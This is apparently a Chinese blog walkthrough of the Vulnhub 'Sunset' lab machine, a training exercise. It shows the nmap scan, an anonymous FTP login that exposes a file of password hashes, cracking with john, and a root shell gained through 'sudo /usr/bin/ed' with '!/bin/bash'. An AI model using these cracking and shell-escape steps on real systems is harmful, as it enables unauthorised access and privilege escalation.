• Sunset: Vulnhub Walkthrough

    主机扫描:

    ╰─ nmap -p1-65535 -sV -A 10.10.202.147

    PORT STATE SERVICE VERSION
    21/tcp open ftp pyftpdlib 1.5.5
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_-rw-r--r-- 1 root root 1062 Jul 29 00:00 backup
    | ftp-syst:
    | STAT:
    | FTP server status:
    | Connected to: 10.10.202.147:21
    | Waiting for username.
    | TYPE: ASCII; STRUcture: File; MODE: Stream
    | Data connection closed.
    |_End of status.
    22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
    | ssh-hostkey:
    | 2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
    | 256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
    |_ 256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (ED25519)

    匿名访问FTP

    username: anonymous

    password:空 

    ╰─ cat backup
    CREDENTIALS:
    office:$6$$9ZYTy.VI0M7cG9tVcPl.QZZi2XHOUZ9hLsiCr/avWTajSPHqws7.75I9ZjP4HwLN3Gvio5To4gjBdeDGzhq.X.
    datacenter:$6$$3QW/J4OlV3naFDbhuksxRXLrkR6iKo4gh.Zx1RfZC2OINKMiJ/6Ffyl33OFtBvCI7S4N1b8vlDylF2hG2N0NN/
    sky:$6$$Ny8IwgIPYq5pHGZqyIXmoVRRmWydH7u2JbaTo.H2kNG7hFtR.pZb94.HjeTK1MLyBxw8PUeyzJszcwfH0qepG0
    sunset:$6$406THujdibTNu./R$NzquK0QRsbAUUSrHcpR2QrrlU3fA/SJo7sPDPbP3xcCR/lpbgMXS67Y27KtgLZAcJq9KZpEKEqBHFLzFSZ9bo/
    space:$6$$4NccGQWPfiyfGKHgyhJBgiadOlP/FM4.Qwl1yIWP28ABx.YuOsiRaiKKU.4A1HKs9XLXtq8qFuC3W6SCE4Ltx/

    使用john进行暴力破解

    将其hash复制到新的文本,1.txt

    ╰─ john 1.txt 

    查看爆破成功的密码

    ╰─ john --show 1.txt

    sky:sky
    sunset:cheer14
    space:space

    经过尝试:sunset:cheer14 可以登录系统

    尝试提权:

    sudo /usr/bin/ed
    !/bin/bash
    root@sunset:/home/sunset#
    root@sunset:/home/sunset# id
    uid=0(root) gid=0(root) groups=0(root)

    完! 
  • 相关阅读:
    var 和 let 的区别
    js初步认识变量
    弹性布局
    盒模型
    多重样式优先级深入概念
    层叠机制--比较特殊性
    anroid抓包工具tcpdump的用法
    linux find grep组合使用
    Protect Broadcast 保护广播
    android:exported 属性详解
  • 原文地址:https://www.cnblogs.com/hack404/p/11298094.html
Copyright © 2020-2023  润新知